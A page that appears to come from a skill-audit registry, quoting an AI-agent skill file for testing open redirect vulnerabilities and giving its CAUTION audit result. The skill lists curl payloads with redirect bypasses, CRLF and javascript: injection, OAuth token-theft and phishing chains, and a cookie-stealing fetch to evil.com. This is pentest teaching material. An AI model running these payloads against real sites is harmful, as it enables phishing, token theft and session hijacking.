Testing For Open Redirect VulnerabilitiesCAUTION
817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI & 20+ platforms · 29 security domains ·
Overview
817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI & 20+ platforms · 29 security domains ·
6c59587be632OBSERVED · 2026-10-07What it tells the agent
The instruction file, verbatim from the audited commit — this is the text the model reads, and the surface the audit's instruction layer examines. Quoted here so you can judge it without cloning anything.
--- name: testing-for-open-redirect-vulnerabilities description: Identifies and exploits open redirect vulnerabilities by analyzing URL redirection parameters (next, url, redirect, return, goto), applying bypass techniques, and chaining findings into phishing or token-theft exploits, using Burp Suite/OWASP ZAP and Burp Collaborator. Use when testing login/logout flows, OAuth redirect_uri handling, or SSO redirect validation. domain: cybersecurity subdomain: web-application-security tags: - open-redirect - url-redirect - phishing - owasp - url-validation - redirect-bypass - unvalidated-redirect version: '1.0' author: mahipal license: Apache-2.0 nist_csf: - PR.PS-01 - ID.RA-01 - PR.DS-10 - DE.CM-01 mitre_attack: - T1190 - T1059.007 - T1505.003 - T1083 - T1566 --- # Testing for Open Redirect Vulnerabilities ## When to Use - When testing login/logout flows that redirect users to specified URLs - During assessment of OAuth authorization endpoints with redirect_uri parameters - When auditing applications with URL parameters (next, url, redirect, return, goto, target) - During phishing simulation to chain open redirects with credential harvesting - When testing SSO implementations for redirect validation weaknesses ## Prerequisites - Burp Suite or OWASP ZAP for intercepting redirect requests - Collection of open redirect bypass payloads - External domain or Burp Collaborator for redirect confirmation - Understanding of URL parsing and encoding schemes - Browser with developer tools for observing redirect chains - Knowledge of HTTP 301/302/303/307/308 redirect status codes > **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws. ## Workflow ### Step 1 — Identify Redirect Parameters ```bash # Common redirect parameter names to test: # ?url= ?redirect= ?next= ?return= ?returnUrl= ?goto= ?target= # ?dest= ?destination= ?redir= ?redirect_uri= ?continue= ?view= # Search for redirect parameters in the application # Use Burp Suite to crawl and identify all parameters # Test basic redirect curl -v "http://target.com/login?next=https://evil.com" curl -v "http://target.com/logout?redirect=https://evil.com" curl -v "http://target.com/oauth/authorize?redirect_uri=https://evil.com" ``` ### Step 2 — Test Basic Open Redirect Payloads ```bash # Direct external URL curl -v "http://target.com/redirect?url=https://evil.com" # Protocol-relative URL curl -v "http://target.com/redirect?url=//evil.com" # URL with @ symbol (userinfo abuse) curl -v "http://target.com/redirect?url=https://[email protected]" # Backslash-based redirect curl -v "http://target.com/redirect?url=https://evil.com\@target.com" # Null byte injection curl -v "http://target.com/redirect?url=https://evil.com%00.target.com" ``` ### Step 3 — Apply Validation Bypass Techniques ```bash # Subdomain confusion bypass curl -v "http://target.com/redirect?url=https://target.com.evil.com" curl -v "http://target.com/redirect?url=https://evil.com/target.com" # URL encoding bypass curl -v "http://target.com/redirect?url=https%3A%2F%2Fevil.com" curl -v "http://target.com/redirect?url=%68%74%74%70%73%3a%2f%2f%65%76%69%6c%2e%63%6f%6d" # Double URL encoding curl -v "http://target.com/redirect?url=%2568%2574%2574%2570%253A%252F%252Fevil.com" # Mixed case protocol curl -v "http://target.com/redirect?url=HtTpS://evil.com" # CRLF injection in redirect curl -v "http://target.com/redirect?url=%0d%0aLocation:%20https://evil.com" # JavaScript protocol curl -v "http://target.com/redirect?url=javascript:alert(document.domain)" # Data URI curl -v "http://target.com/redirect?url=data:text/html,<script>alert(1)</script>" ``` ### Step 4 — Test Path-Based Redirects ```bash # Relative path injection curl -v "http://target.com/redirect?url=/\evil.com" curl -v "http://target.com/redirect?url=/.evil.com" # Path traversal with redirect curl -v "http://target.com/redirect?url=/../../../evil.com" # Fragment-based bypass curl -v "http://target.com/redirect?url=https://evil.com#target.com" # Parameter pollution for redirect curl -v "http://target.com/redirect?url=https://target.com&url=https://evil.com" ``` ### Step 5 — Chain with Other Vulnerabilities ```bash # Chain with OAuth for token theft # Step 1: Find open redirect on target.com # Step 2: Use it as redirect_uri in OAuth flow curl -v "http://target.com/oauth/authorize?client_id=CLIENT&redirect_uri=http://target.com/redirect?url=https://evil.com&response_type=code" # Chain with phishing # Create convincing phishing page at evil.com # Use open redirect: http://target.com/redirect?url=https://evil.com/login # Victim sees target.com in the initial URL # Chain with XSS via javascript: protocol curl -v "http://target.com/redirect?url=javascript:fetch('https://evil.com/?c='+document.cookie)" ``` ### Step 6 — Automate Open Redirect Testing ```bash # Use OpenRedireX for automated testing python3 openredirex.py -l urls.txt -p payloads.txt --keyword FUZZ # Use gf tool to extract redirect parameters from URLs cat urls.txt | gf redirect | sort -u > redirect_params.txt # Mass test with nuclei echo "http://target.com" | nuclei -t http/vulnerabilities/generic/open-redirect.yaml # Test with ffuf ffuf -w open-redirect-payloads.txt -u "http://target.com/redirect?url=FUZZ" -mr "Location: https://evil" ``` ## Key Concepts | Concept | Description | |---------|-------------| | Unvalidated Redirect | Application redirects to user-supplied URL without checking destination | | URL Parsing Inconsistency | Different libraries parse URLs differently, enabling bypass | | Protocol-Relative URL | Using // prefix to redirect while inheriting current protocol | | Userinfo Abuse | Using @ symbol to make URL appear to belong to trusted domain | | Open Redirect Chain | Combining multiple open redirects or chaining with other vulnerabilities | | DOM-Based Redi
Trust audit
CAUTIONgrade B · trust 89/100 Install with care. The audit found things worth knowing before you trust its output.
| Layer | What it checks | Result |
|---|---|---|
| L0 | Provenance & inventory | PASS |
| L1 | Static analysis of the code | PASS |
| L2 | Instruction surface (what it tells the agent) | FAIL |
| L3 | Class-specific surface | PASS |
| L4 | Behavioural (sandbox) | SKIPPED |
What the source does
- Filesystem
- none-observed
- Network
- declared (1 observation(s))
- Shell
- none-observed
- Dependencies
- pinned
- Secrets in source
- none-found
Findings (1)
- During phishing simulation to chain open redirects with credential harvesting
Gates applied: no_behavioural_pass.
6c59587be632full audit observations/trust-audit/skill/mukul975__testing-for-open-redirect-vulnerabilities.json · Report an issue / request a re-scanAudit history
Every audit this skill has had.
| Date | Source | Verdict | Grade | Score | Change |
|---|---|---|---|---|---|
| 2026-10-07 | 6c59587be632 | CAUTION | B | 89 | first audit |
Questions
What does the Testing For Open Redirect Vulnerabilities skill do?
817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI & 20+ platforms · 29 security domains ·
Is Testing For Open Redirect Vulnerabilities safe to install?
With care. The audit graded it B (89/100) and found 1 thing worth knowing before you trust this skill, listed below with the exact line each was found on.
What can Testing For Open Redirect Vulnerabilities access on my machine?
The audit observed that it reaches the network. Each of those is consistent with what it says it does. Secrets in the source: none found.
How current is this page?
The grade is for one exact copy of the source (6c59587be632), read on 2026-10-07. The repository is watched, and a new audit runs when it changes — this is the first audit.